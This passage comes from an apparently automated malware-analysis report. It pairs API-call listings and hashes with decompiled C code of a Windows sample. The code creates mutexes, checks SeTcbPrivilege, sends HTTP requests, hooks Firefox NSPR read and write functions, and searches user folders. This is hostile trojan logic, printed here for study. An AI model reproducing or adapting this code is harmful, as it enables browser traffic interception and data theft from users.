      • Part of subcall function 0040EDBB: CreateMutexW.KERNEL32(00422BD0,00000000,?,?,?,?,?), ref: 0040EDDC
    • GetCurrentThread.KERNEL32 ref: 0040DE60
    • SetThreadPriority.KERNEL32(00000000), ref: 0040DE67
    • WaitForSingleObject.KERNEL32(0000EA60), ref: 0040DE85
    • CreateMutexW.KERNEL32(00422BD0,00000001,?,20000000), ref: 0040DF48
    • GetLastError.KERNEL32 ref: 0040DF58
    • CloseHandle.KERNEL32(00000000), ref: 0040DF66
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp
    • Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp
    • Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp
    Similarity
    • API ID: CreateMutexThread$CloseCurrentErrorHandleLastObjectPrioritySingleWait
    • String ID: Global\%08X%08X%08X
    • API String ID: 3448221409-3239447729
    • Opcode ID: 44956bcca47d16276b05bbf08a513f2c613f6cb0b486cf0377f57f50e972279a
    • Instruction ID: 9c5dfea0fc15b11e624fa0cc340d72acb178562ce1c3e4768cee6e39fb074b9b
    • Opcode Fuzzy Hash: 44956bcca47d16276b05bbf08a513f2c613f6cb0b486cf0377f57f50e972279a
    • Instruction Fuzzy Hash: 1741B430A00606ABDB217BB2CD46BAF7665AF00718F10463BF511F62E2DB7CCD90966C
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 72%
    			E00408EC9(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
    				struct HINSTANCE__* _v8;
    				char _v12;
    				char _v16;
    				_Unknown_base(*)()* _v20;
    				intOrPtr _v24;
    				char _v40;
    				char _v60;
    				char _v84;
    				char _v112;
    				void* __edi;
    				void* __esi;
    				struct HINSTANCE__* _t30;
    				_Unknown_base(*)()* _t42;
    				intOrPtr _t44;
    				intOrPtr _t50;
    				intOrPtr* _t55;
    				void* _t57;
    				void* _t58;
    				intOrPtr* _t59;
    				CHAR* _t61;
    				CHAR* _t62;
    				CHAR* _t63;
    				_Unknown_base(*)()* _t64;
    				WCHAR* _t66;
    				void* _t68;
    				void* _t75;
    
    				_t58 = __ecx;
    				_t66 =  &_v112;
    				E0040FA33(0xdd, _t66);
    				_t30 = LoadLibraryW(_t66);
    				_v8 = _t30;
    				if(_t30 != 0) {
    					_t61 =  &_v84;
    					E0040F9FD(0xde, _t61);
    					_t55 = GetProcAddress(_v8, _t61);
    					_t62 =  &_v40;
    					E0040F9FD(0xdf, _t62);
    					_v20 = GetProcAddress(_v8, _t62);
    					_t63 =  &_v60;
    					E0040F9FD(0xe0, _t63);
    					_t42 = GetProcAddress(_v8, _t63);
    					_t68 = 0;
    					_t64 = _t42;
    					if(_t55 == 0 || _v20 == 0 || _t64 == 0) {
    						L16:
    						return FreeLibrary(_v8);
    					} else {
    						_t44 = E00417A74(L"SeTcbPrivilege");
    						__imp__WTSGetActiveConsoleSessionId();
    						_v24 = _t44;
    						asm("in al, dx");
    						if(_t44 != 0xffffffff) {
    							E00408E58(_t58, 0, _t64, _t44, _a4, _a8);
    						}
    						_t75 =  *_t55(_t68, _t68, 1,  &_v16,  &_v12);
    						if(_t75 == 0) {
    							goto L16;
    						} else {
    							_t57 = 0;
    							if(_v12 <= _t68) {
    								L15:
    								_v20(_v16);
    								goto L16;
    							} else {
    								goto L10;
    							}
    							do {
    								L10:
    								_t59 = _t68 + _v16;
    								_t50 =  *((intOrPtr*)(_t59 + 8));
    								if(_t50 == 0 || _t50 == 4) {
    									_t51 =  *_t59;
    									if( *_t59 != _v24) {
    										E00408E58(_t59, _t68, _t64, _t51, _a4, _a8);
    									}
    								}
    								_t57 = _t57 + 1;
    								_t68 = _t68 + 0xc;
    							} while (_t57 < _v12);
    							goto L15;
    						}
    					}
    				}
    				return _t30;
    			}

    APIs
    • LoadLibraryW.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,0040985F,?,?), ref: 00408EE0
    • GetProcAddress.KERNEL32(?,?), ref: 00408F0C
    • GetProcAddress.KERNEL32(?,?), ref: 00408F23
    • GetProcAddress.KERNEL32(?,?), ref: 00408F3B
    • FreeLibrary.KERNEL32(?), ref: 00408FC4
      • Part of subcall function 00417A74: GetCurrentThread.KERNEL32 ref: 00417A84
      • Part of subcall function 00417A74: OpenThreadToken.ADVAPI32(00000000,?,?,?,?,00408F58,SeTcbPrivilege), ref: 00417A8B
      • Part of subcall function 00417A74: OpenProcessToken.ADVAPI32(000000FF,00000020,00408F58,?,?,?,?,00408F58,SeTcbPrivilege), ref: 00417A9D
    • WTSGetActiveConsoleSessionId.KERNEL32(SeTcbPrivilege,?,?,?,?,?,?,?,?,?,?,?,0040985F,?,?,00000000), ref: 00408F58
      • Part of subcall function 00408E58: EqualSid.ADVAPI32(00000000,0000000C,?,00408FD1,?,00408FB2,00408FD1,?,?,?), ref: 00408E7D
      • Part of subcall function 00408E58: CloseHandle.KERNEL32(?,?,00408FD1,?,00408FB2,00408FD1,?,?,?), ref: 00408EBE
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp
    • Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp
    • Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp
    Similarity
    • API ID: AddressProc$LibraryOpenThreadToken$ActiveCloseConsoleCurrentEqualFreeHandleLoadProcessSession
    • String ID: .exe$SeTcbPrivilege
    • API String ID: 1107370034-552748125
    • Opcode ID: 0bba9a06da91cb5b4d580f3f9d5f51d2ed0af1bbceddb0ae03c64cfbc8726b4a
    • Instruction ID: 2013914dc8b6833cb27c338b05c7edef00abd6b09f08614082261d6dd8d1b5c2
    • Opcode Fuzzy Hash: 0bba9a06da91cb5b4d580f3f9d5f51d2ed0af1bbceddb0ae03c64cfbc8726b4a
    • Instruction Fuzzy Hash: 49318F31A00119BBCF11ABA4CE419AFBB79EF44304F10013BF841F6290CB759E45DBA4
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 90%
    			E00418090(void* _a4, long _a8, void* _a12, long _a16, void _a20) {
    				long _t18;
    				char* _t21;
    				signed int _t29;
    				char* _t30;
    				void* _t32;
    
    				_t29 = _a20 & 0x00000002;
    				_t18 = 0x8404f700;
    				if(_t29 != 0) {
    					_t18 = 0x8444f700;
    				}
    				if((_a20 & 0x00000004) != 0) {
    					_t18 = _t18 | 0x00800000;
    				}
    				_t30 = "POST";
    				if((_a20 & 0x00000001) == 0) {
    					_t30 = "GET";
    				}
    				_t32 = HttpOpenRequestA(_a4, _t30, _a8, "HTTP/1.1", 0, 0x422000, _t18, 0);
    				if(_t32 == 0) {
    					L15:
    					return 0;
    				} else {
    					if(_t29 == 0) {
    						_push(0x13);
    						_t21 = "Connection: close\r\n";
    						_pop(0);
    					} else {
    						_t21 = 0;
    					}
    					if(HttpSendRequestA(_t32, _t21, 0, _a12, _a16) == 0) {
    						L14:
    						InternetCloseHandle(_t32);
    						goto L15;
    					} else {
    						_a20 = _a20 & 0x00000000;
    						_a8 = 4;
    						if(HttpQueryInfoA(_t32, 0x20000013,  &_a20,  &_a8, 0) == 0 || _a20 != 0xc8) {
    							goto L14;
    						} else {
    							return _t32;
    						}
    					}
    				}
    			}

    0x00418097
    0x0041809b
    0x004180a0
    0x004180a2
    0x004180a2
    0x004180ab
    0x004180ad
    0x004180ad
    0x004180b6
    0x004180bb
    0x004180bd
    0x004180bd
    0x004180de
    0x004180e2
    0x00418142
    0x00000000
    0x004180e4
    0x004180e6
    0x004180ee
    0x004180f0
    0x004180f5
    0x004180e8
    0x004180e8
    0x004180ea
    0x00418107
    0x0041813b
    0x0041813c
    0x00000000
    0x00418109
    0x00418109
    0x0041811d
    0x0041812c
    0x00000000
    0x00418137
    0x00000000
    0x00418137
    0x0041812c
    0x00418107

    APIs
    • HttpOpenRequestA.WININET(?,POST,?,HTTP/1.1,00000000,00422000,8404F700,00000000), ref: 004180D8
    • HttpSendRequestA.WININET(00000000,Connection: close,00000013,?,?), ref: 004180FF
    • HttpQueryInfoA.WININET(00000000,20000013,00000000,?,00000000), ref: 00418124
    • InternetCloseHandle.WININET(00000000), ref: 0041813C
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp
    • Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp
    • Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp
    Similarity
    • API ID: Http$Request$CloseHandleInfoInternetOpenQuerySend
    • String ID: Connection: close$GET$HTTP/1.1$POST
    • API String ID: 3080274660-1621676011
    • Opcode ID: 80201272b0941e57adff15bd2aeb3f098f64aa5e38a2602c4429c5faa5035b24
    • Instruction ID: 4e1af37f282a18607ebb11c29f3d7c9f4765a7b66f40b9bd97d97e8845d5a83b
    • Opcode Fuzzy Hash: 80201272b0941e57adff15bd2aeb3f098f64aa5e38a2602c4429c5faa5035b24
    • Instruction Fuzzy Hash: AC1181722112097BEB214E508D45FE73A9CEB44758F10802AFE01A62A0DBB9DD9587AC
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 83%
    			E004159B8(void* __ecx, void* __edx, struct HINSTANCE__* __edi) {
    				void* __ebx;
    				_Unknown_base(*)()* _t4;
    				void* _t9;
    				void* _t10;
    				void* _t11;
    				void* _t12;
    
    				_t12 = __edx;
    				_t11 = __ecx;
    				 *0x422360 = GetProcAddress(__edi, "PR_OpenTCPSocket");
    				 *0x422370 = GetProcAddress(__edi, "PR_Close");
    				 *0x422380 = GetProcAddress(__edi, "PR_Read");
    				_t4 = GetProcAddress(__edi, "PR_Write");
    				_push(0x422360);
    				_t9 = 4;
    				 *0x422390 = _t4;
    				_t10 = E004156F0(_t9, _t11, _t12);
    				if(_t10 != 0) {
    					E00412B09(__edi,  *0x422368,  *0x422378,  *0x422388,  *0x422398);
    				}
    				return _t10;
    			}
    0x004159b8
    0x004159b8
    0x004159ce
    0x004159db
    0x004159e8
    0x004159ed
    0x004159ef
    0x004159f6
    0x004159f7
    0x00415a01
    0x00415a05
    0x00415a21
    0x00415a21
    0x00415a2a

    APIs
    • GetProcAddress.KERNEL32(00000000,PR_OpenTCPSocket), ref: 004159C6
    • GetProcAddress.KERNEL32(00000000,PR_Close), ref: 004159D3
    • GetProcAddress.KERNEL32(00000000,PR_Read), ref: 004159E0
    • GetProcAddress.KERNEL32(00000000,PR_Write), ref: 004159ED
      • Part of subcall function 004156F0: VirtualAllocEx.KERNEL32(000000FF,00000000,00000034,00003000,00000040,00000000,77E49EB0,?,?,004159B6,00422020,00000000,0040E974), ref: 00415727
      • Part of subcall function 00412B09: InitializeCriticalSection.KERNEL32(0042307C,74B04EE0,00415A26,00422360), ref: 00412B1F
      • Part of subcall function 00412B09: GetProcAddress.KERNEL32(00000000,PR_GetNameForIdentity), ref: 00412B5B
      • Part of subcall function 00412B09: GetProcAddress.KERNEL32(PR_SetError), ref: 00412B6D
      • Part of subcall function 00412B09: GetProcAddress.KERNEL32(PR_GetError), ref: 00412B7F
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp
    • Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp
    • Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp
    Similarity
    • API ID: AddressProc$AllocCriticalInitializeSectionVirtual
    • String ID: PR_Close$PR_OpenTCPSocket$PR_Read$PR_Write
    • API String ID: 1833644279-3954199073
    • Opcode ID: 1e1bd52c6f2de0c89ca3d518b3305bc1ac1c1f2db7dfc98eee6008c2fa8e61f5
    • Instruction ID: 014fd1e5d22c4949a45350cc3e3947508174571bf4fd34e88478ada2e3ec2d63
    • Opcode Fuzzy Hash: 1e1bd52c6f2de0c89ca3d518b3305bc1ac1c1f2db7dfc98eee6008c2fa8e61f5
    • Instruction Fuzzy Hash: 63F03071B80314BACA219F75BD46E967FA8BB86B503D0013BB904A71B0C7FD0452DA5C
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 96%
    			E00414E0E(char __eax, void* __ecx, char* _a4, intOrPtr* _a8, signed int* _a12) {
    				char _v540;
    				char _v800;
    				char _v804;
    				char _v860;
    				struct _SYSTEMTIME _v876;
    				char _v900;
    				signed int _v968;
    				signed int _v980;
    				intOrPtr _v984;
    				intOrPtr _v988;
    				char* _v992;
    				char _v996;
    				void* _v1008;
    				struct _SYSTEMTIME _v1028;
    				signed int _v1032;
    				short _v1036;
    				signed short* _v1040;
    				signed int _v1044;
    				intOrPtr* _v1048;
    				signed int _v1052;
    				signed int _v1056;
    				signed int _v1060;
    				signed int _v1064;
    				char _v1068;
    				intOrPtr _v1072;
    				char _v1076;
    				intOrPtr _v1080;
    				intOrPtr _v1084;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				intOrPtr _t158;
    				signed int _t159;
    				intOrPtr _t160;
    				signed int _t168;
    				void* _t188;
    				void* _t199;
    				signed int _t211;
    				signed int _t215;
    				signed int _t218;
    				signed char _t222;
    				signed int _t224;
    				void* _t227;
    				void* _t228;
    				signed int _t229;
    				signed int _t230;
    				signed int _t240;
    				void* _t242;
    				signed int _t250;
    				intOrPtr* _t254;
    				signed int _t255;
    				void* _t257;
    				intOrPtr _t258;
    				short* _t261;
    				void* _t280;
    				intOrPtr* _t286;
    				signed int _t291;
    				long _t294;
    				signed short* _t296;
    				signed short* _t298;
    				signed int _t301;
    				intOrPtr* _t303;
    				signed int _t307;
    				void* _t309;
    
    				_t257 = __ecx;
    				_t309 = (_t307 & 0xfffffff8) - 0x424;
    				_v1032 = _v1032 & 0x00000000;
    				if(__eax == 0) {
    					L52:
    					asm("sbb eax, eax");
    					return  ~0x00000000;
    				} else {
    					_t3 = _t257 + 0x10; // 0x10f
    					_t286 = _t3;
    					_v1048 = _t286;
    					_v1028.wDayOfWeek = __eax;
    					do {
    						_t258 =  *_t286;
    						_t279 =  *(_t286 - 0x10) >> 0x0000000a & 0x00000008;
    						_v1028.wHour = _t279;
    						if(_t258 == 0) {
    							_t254 = _a8;
    							L6:
    							_t259 =  *(_t286 + 4);
    							_v1052 = _v1052 & 0x00000000;
    							_v1064 = _v1064 & 0x00000000;
    							_t158 =  *((intOrPtr*)(_t286 + 8)) + _t259;
    							_v1028.wSecond = _t158;
    							if(_t259 >= _t158) {
    								L35:
    								_t159 =  *(_t286 - 0x10);
    								_t294 = 0;
    								if((_t159 & 0x00000008) != 0 && _v1052 != 0) {
    									if((_t159 & 0x00000200) == 0) {
    										_t255 = E004165E8(_t159 | 0xffffffff, 0, _a4);
    										__eflags = _t255;
    										if(_t255 != 0) {
    											_t188 = 9;
    											E0040FA33(_t188,  &_v996);
    											_push(_v1052);
    											E0040592A(_t259, _t279, __eflags, 0xc9, _t255, 0,  &_v996, _t255);
    											_t309 = _t309 + 0x18;
    											E004163A8(_t255);
    										}
    									} else {
    										_t280 = 0x3c;
    										E0041645B( &_v996,  &_v996, 0, _t280);
    										_v992 =  &_v800;
    										_v1008 = _t280;
    										_v988 = 0x103;
    										if(InternetCrackUrlA(_a4, 0, 0,  &_v1008) == 1 && _v992 > 0) {
    											GetSystemTime( &_v1028);
    											_t306 =  &_v876;
    											_t199 = 8;
    											E0040FA33(_t199,  &_v876);
    											_push(_v1028.wDay & 0x0000ffff);
    											_push(_v1028.wMonth & 0x0000ffff);
    											_push((_v1028.wYear & 0x0000ffff) - 0x7d0);
    											_push( &_v804);
    											E0041709B( &_v876, 0x104,  &_v540, _t306);
    											_t309 = _t309 + 0x14;
    											E00405780(_t259, 0x104, 2, 0,  &_v540, _v1068, _v1080);
    											_t286 = _v1084;
    										}
    									}
    									E004163A8(_v1052);
    									_t294 = 0;
    								}
    								if( *((intOrPtr*)(_t286 - 4)) != _t294) {
    									if(( *(_t286 - 0x10) & 0x00000010) == 0) {
    										EnterCriticalSection(0x423124);
    										E004163A8( *0x42313c);
    										_t168 = E00416806(E004163A8( *0x423140) | 0xffffffff,  *((intOrPtr*)(_t286 - 0xc)));
    										 *0x42313c = _t168;
    										__eflags = _t168 | 0xffffffff;
    										 *0x423140 = E00416806(_t168 | 0xffffffff,  *((intOrPtr*)(_t286 - 4)));
    										LeaveCriticalSection(0x423124);
    										goto L51;
    									}
    									E0040F16A( &_v860, _t259, 1,  &_v996);
    									if(E0041764D( &_v900,  *((intOrPtr*)(_t286 - 4)), E00416EE5( *((intOrPtr*)(_t286 - 4)))) == 0) {
    										goto L51;
    									}
    									_t261 =  &_v860;
    									do {
    										E00416710( *((intOrPtr*)(_t309 + _t294 + 0xb8)), _t261);
    										_t294 = _t294 + 1;
    										_t261 = _t261 + 4;
    									} while (_t294 < 0x10);
    									 *_t261 = 0;
    									GetLocalTime( &_v876);
    									E0041A627(_t261,  &_v996,  &_v860, 3,  &_v876, 0x10);
    								}
    								goto L51;
    							} else {
    								goto L9;
    								L13:
    								_t279 =  *_t211 & 0x0000ffff;
    								if(_t279 != 4) {
    									_t259 = _t211 + 4;
    									_t218 = E00414134(_v1028.wHour, _t211 + 4, 0,  &_v1056, _t279 - 4,  *_t254 + _v1060,  *_a12 - _v1060);
    									__eflags = _t218;
    									if(_t218 == 0) {
    										L33:
    										if(_v1028.wYear < _v1028.wSecond) {
    											_t259 = _v1028.wYear;
    											L9:
    											_t211 = ( *_t259 & 0x0000ffff) + _t259;
    											_t296 = ( *_t211 & 0x0000ffff) + _t211;
    											_v1028.wYear = _t296 + ( *_t296 & 0x0000ffff);
    											_t279 =  *_t259 & 0x0000ffff;
    											_v1036 = _t259;
    											_v1044 = _t211;
    											_v1040 = _t296;
    											if(( *_t259 & 0x0000ffff) != 4) {
    												goto L11;
    											} else {
    												_v1060 = _v1060 & 0x00000000;
    												goto L13;
    											}
    										}
    										_t286 = _v1048;
    										goto L35;
    									}
    									__eflags =  *_v1036 - 4;
    									_t298 = _v1040;
    									if( *_v1036 != 4) {
    										_t54 =  &_v1056;
    										 *_t54 = _v1056 + _v1060;
    										__eflags =  *_t54;
    									} else {
    										_v1060 = _v1056;
    									}
    									L22:
    									_t259 = _v1056 - _v1060;
    									_t222 =  *(_v1048 - 0x10);
    									_t291 = ( *_t298 & 0x0000ffff) - 4;
    									_v1044 = _t259;
    									if((_t222 & 0x00000004) == 0) {
    										__eflags = _t222 & 0x00000008;
    										if((_t222 & 0x00000008) != 0) {
    											_t224 = E00416333(_t259 + _t291 + _v1064 + 2,  &_v1052);
    											__eflags = _t224;
    											if(_t224 != 0) {
    												_t301 = _v1052;
    												__eflags = _t291;
    												if(_t291 != 0) {
    													E004163E4(_v1064 + _t301,  &(_v1040[2]), _t291);
    													_t84 =  &_v1076;
    													 *_t84 = _v1076 + _t291;
    													__eflags =  *_t84;
    												}
    												_t279 = _v1044;
    												_t227 = E004163E4(_v1064 + _t301,  *_t254 + _v1060, _t279);
    												_t259 = _v1060;
    												__eflags =  *(_t259 - 0x10) & 0x00000100;
    												if(( *(_t259 - 0x10) & 0x00000100) == 0) {
    													_t228 = E0041AFD0(_t227, _t279);
    													_t95 =  &_v1068;
    													 *_t95 = _v1068 + _t228;
    													__eflags =  *_t95;
    													_t254 = _a8;
    												} else {
    													_v1064 = _v1064 + _t279;
    												}
    												_t229 = _v1064;
    												 *((char*)(_t229 + _t301)) = 0xa;
    												_t230 = _t229 + 1;
    												__eflags = _t230;
    												_v1064 = _t230;
    												 *((char*)(_t230 + _t301)) = 0;
    											}
    										}
    									} else {
    										_v1036 =  *_a12 - _t259 + _t291;
    										_t240 = E00416378( *_a12 - _t259 + _t291);
    										_v1044 = _t240;
    										if(_t240 != 0) {
    											_t279 = _v1060;
    											_t242 = E004163E4(E004163E4(_t240,  *_t254, _v1060) + _v1060,  &(_t298[2]), _t291);
    											_t303 = _a12;
    											_t259 =  *_t254 + _v1080;
    											E004163E4(_t242 + _t291 + _v1060,  *_t254 + _v1080,  *_t303 - _v1080);
    											E004163A8( *_t254);
    											_v1072 = _v1072 + 1;
    											 *_t254 = _v1084;
    											 *_t303 = _v1076;
    										}
    									}
    									goto L33;
    								}
    								if( *_t259 != _t279) {
    									_t250 = _v1060;
    								} else {
    									_t250 =  *_a12;
    								}
    								_v1056 = _t250;
    								goto L22;
    								L11:
    								_t215 = E00414134(_v1028.wHour, _t259,  &_v1060, 0, _t279 - 4,  *_t254,  *_a12);
    								__eflags = _t215;
    								if(_t215 == 0) {
    									goto L33;
    								}
    								_t298 = _v1040;
    								_t211 = _v1044;
    								_t259 = _v1036;
    								goto L13;
    							}
    						}
    						_v996 = 0x2a3f;
    						_v992 = _t258;
    						_t160 = E00416EE5(_t258);
    						_t254 = _a8;
    						_v988 = _t160;
    						_v984 =  *_t254;
    						_t279 = _t279 | 0x00000012;
    						_v980 =  *_a12;
    						_v968 = _t279;
    						if(E0041732C( &_v996) != 0) {
    							goto L6;
    						}
    						L51:
    						_t286 = _t286 + 0x1c;
    						_t150 =  &(_v1028.wDayOfWeek);
    						 *_t150 = _v1028.wDayOfWeek - 1;
    						_v1048 = _t286;
    					} while ( *_t150 != 0);
    					goto L52;
    				}
    			}
    0x00414e0e
    0x00414e14
    0x00414e1a
    0x00414e24
    0x004152af
    0x004152b6
    0x004152bf
    0x00414e2a
    0x00414e2a
    0x00414e2a
    0x00414e2d
    0x00414e31
    0x00414e35
    0x00414e38
    0x00414e3d
    0x00414e40
    0x00414e46
    0x00414e88
    0x00414e8b
    0x00414e8b
    0x00414e91
    0x00414e96
    0x00414e9b
    0x00414e9d
    0x00414ea3
    0x004150a5
    0x004150a5
    0x004150a8
    0x004150ac
    0x004150c1
    0x00415186
    0x00415188
    0x0041518a
    0x00415192
    0x00415193
    0x00415198
    0x004151a8
    0x004151ad
    0x004151b1
    0x004151b1
    0x004150c7
    0x004150c9
    0x004150d1
    0x004150dd
    0x004150eb
    0x004150ef
    0x00415100
    0x00415115
    0x0041511d
    0x00415124
    0x00415125
    0x0041512f
    0x00415135
    0x00415140
    0x00415148
    0x00415158
    0x0041515d
    0x0041516f
    0x00415174
    0x00415174
    0x00415100
    0x004151ba
    0x004151bf
    0x004151bf
    0x004151c4
    0x004151ce
    0x0041525b
    0x00415267
    0x0041527d
    0x00415282
    0x0041528a
    0x00415293
    0x00415298
    0x00000000
    0x00415298
    0x004151e2
    0x00415200
    0x00000000
    0x00000000
    0x00415206
    0x0041520d
    0x00415214
    0x00415219
    0x0041521a
    0x0041521d
    0x00415224
    0x0041522f
    0x0041524e
    0x0041524e
    0x00000000
    0x00414ea9
    0x00414ea9
    0x00414f0e
    0x00414f0e
    0x00414f14
    0x00414f47
    0x00414f4e
    0x00414f53
    0x00414f55
    0x00415093
    0x0041509b
    0x00414eab
    0x00414eaf
    0x00414eb2
    0x00414eb7
    0x00414ebe
    0x00414ec2
    0x00414ec5
    0x00414ec9
    0x00414ecd
    0x00414ed4
    0x00000000
    0x00414ed6
    0x00414ed6
    0x00000000
    0x00414ed6
    0x00414ed4
    0x004150a1
    0x00000000
    0x004150a1
    0x00414f5f
    0x00414f63
    0x00414f67
    0x00414f77
    0x00414f77
    0x00414f77
    0x00414f69
    0x00414f6d
    0x00414f6d
    0x00414f7b
    0x00414f86
    0x00414f8a
    0x00414f8d
    0x00414f90
    0x00414f96
    0x00415008
    0x0041500a
    0x0041501e
    0x00415023
    0x00415025
    0x00415027
    0x0041502b
    0x0041502d
    0x0041503f
    0x00415044
    0x00415044
    0x00415044
    0x00415044
    0x0041504a
    0x0041505b
    0x00415060
    0x00415064
    0x0041506b
    0x00415076
    0x0041507b
    0x0041507b
    0x0041507b
    0x0041507f
    0x0041506d
    0x0041506d
    0x0041506d
    0x00415082
    0x00415086
    0x0041508a
    0x0041508a
    0x0041508b
    0x0041508f
    0x0041508f
    0x00415025
    0x00414f98
    0x00414fa1
    0x00414fa5
    0x00414faa
    0x00414fb0
    0x00414fb6
    0x00414fcc
    0x00414fd1
    0x00414fdf
    0x00414fe7
    0x00414fee
    0x00414ff7
    0x00414ffb
    0x00415001
    0x00415001
    0x00414fb0
    0x00000000
    0x00414f96
    0x00414f19
    0x00414f22
    0x00414f1b
    0x00414f1e
    0x00414f1e
    0x00414f26
    0x00000000
    0x00414edd
    0x00414ef5
    0x00414efa
    0x00414efc
    0x00000000
    0x00000000
    0x00414f02
    0x00414f06
    0x00414f0a
    0x00000000
    0x00414f0a
    0x00414ea3
    0x00414e48
    0x00414e4f
    0x00414e53
    0x00414e58
    0x00414e5b
    0x00414e61
    0x00414e6a
    0x00414e71
    0x00414e75
    0x00414e80
    0x00000000
    0x00414e86
    0x0041529e
    0x0041529e
    0x004152a1
    0x004152a1
    0x004152a5
    0x004152a5
    0x00000000
    0x00414e35

    APIs
    • InternetCrackUrlA.WININET(?,00000000,00000000,?), ref: 004150F7
    • GetSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?), ref: 00415115
    • GetLocalTime.KERNEL32(?,?,?,00000000,00000001,?,00000000,?,-004228D8), ref: 0041522F
    • EnterCriticalSection.KERNEL32(00423124,00000000,?,-004228D8), ref: 0041525B
    • LeaveCriticalSection.KERNEL32(00423124,?,?), ref: 00415298
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp
    • Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp
    • Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp
    Similarity
    • API ID: CriticalSectionTime$CrackEnterInternetLeaveLocalSystem
    • String ID: $1B$?*
    • API String ID: 2400141425-1015212757
    • Opcode ID: 71f75da2dc94852a1a4c63d037ec047f91e1730c7b72769445668c59c5b612ac
    • Instruction ID: 7f34755af472100854ae3490d22aae4afe427d4928ed40890bd0859547b591fb
    • Opcode Fuzzy Hash: 71f75da2dc94852a1a4c63d037ec047f91e1730c7b72769445668c59c5b612ac
    • Instruction Fuzzy Hash: 29E177716083019FD710DF69C880AABB7E5FFC8318F04492EF995A7251D738E985CB6A
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 79%
    			E0040B1FE(char* __ecx, char* __edx, void* __eflags) {
    				intOrPtr _v8;
    				char _v12;
    				intOrPtr _v16;
    				char* _v20;
    				char _v24;
    				intOrPtr _v28;
    				intOrPtr _v32;
    				intOrPtr _v36;
    				intOrPtr _v40;
    				char _v64;
    				char _v84;
    				char _v108;
    				char _v152;
    				char _v180;
    				char _v252;
    				short _v766;
    				char _v772;
    				short _v1292;
    				void* __edi;
    				void* __esi;
    				void* _t46;
    				void* _t48;
    				void* _t53;
    				void* _t57;
    				void* _t59;
    				void* _t61;
    				void* _t68;
    				void* _t70;
    				void* _t75;
    				WCHAR* _t100;
    				signed int _t101;
    				WCHAR* _t103;
    				char* _t108;
    				intOrPtr _t109;
    				void* _t112;
    				intOrPtr _t125;
    
    				_t99 = __edx;
    				_t98 = __ecx;
    				E0041645B( &_v12,  &_v12, 0, 8);
    				_t46 = 0x6a;
    				E0040FA33(_t46,  &_v252);
    				_t48 = 0x6b;
    				E0040FA33(_t48,  &_v108);
    				_t100 =  &_v772;
    				_t53 = E0041A4CC(0x80000001, _t98, _t100,  &_v252,  &_v108, 0x104);
    				if(_t53 != 0xffffffff) {
    					_t115 = _t53;
    					if(_t53 != 0) {
    						ExpandEnvironmentStringsW(_t100,  &_v1292, 0x104);
    						E0040B012(_t99, _t115,  &_v1292,  &_v12);
    						PathRemoveFileSpecW( &_v1292);
    					}
    				}
    				_t101 = 0;
    				if(_v8 != 0) {
    					L14:
    					_t125 = _v8;
    					goto L15;
    				} else {
    					_t57 = 0x6d;
    					E0040FA33(_t57,  &_v64);
    					_t59 = 0x6e;
    					E0040FA33(_t59,  &_v152);
    					_t108 =  &_v84;
    					_t61 = 0x6f;
    					E0040FA33(_t61, _t108);
    					_v24 =  &_v64;
    					_v20 =  &_v152;
    					_v40 = 0x24;
    					_v36 = 0x1a;
    					_v32 = 0x26;
    					_v28 = 0x23;
    					_v16 = _t108;
    					do {
    						_t109 =  *((intOrPtr*)(_t112 + _t101 * 4 - 0x24));
    						__imp__SHGetFolderPathW(0, _t109, 0, 0,  &_v772);
    						if(0 == 0) {
    							_t118 = _t109 - 0x24;
    							if(_t109 == 0x24) {
    								E0040AFD0(_t118,  &_v772,  &_v12, 0);
    								_v766 = 0;
    							}
    							_t99 =  &_v24;
    							_t98 =  &_v772;
    							E0041BAD3( &_v772,  &_v24, 0, 3, 2, E0040B1B5,  &_v12, 0, 0, 0);
    						}
    						_t101 = _t101 + 1;
    					} while (_t101 < 4);
    					if(_v8 != 0) {
    						L15:
    						if(_t125 <= 0) {
    							return E004163A8(_v12);
    						}
    						_push(0xcb);
    						return E004099E1(_t99, _v12, 0x70);
    					}
    					_t68 = 0x6a;
    					E0040FA33(_t68,  &_v180);
    					_t70 = 0x6c;
    					E0040FA33(_t70,  &_v64);
    					_t103 =  &_v772;
    					_t75 = E0041A4CC(0x80000001, _t98, _t103,  &_v180,  &_v64, 0x104);
    					if(_t75 != 0xffffffff) {
    						_t124 = _t75;
    						if(_t75 != 0) {
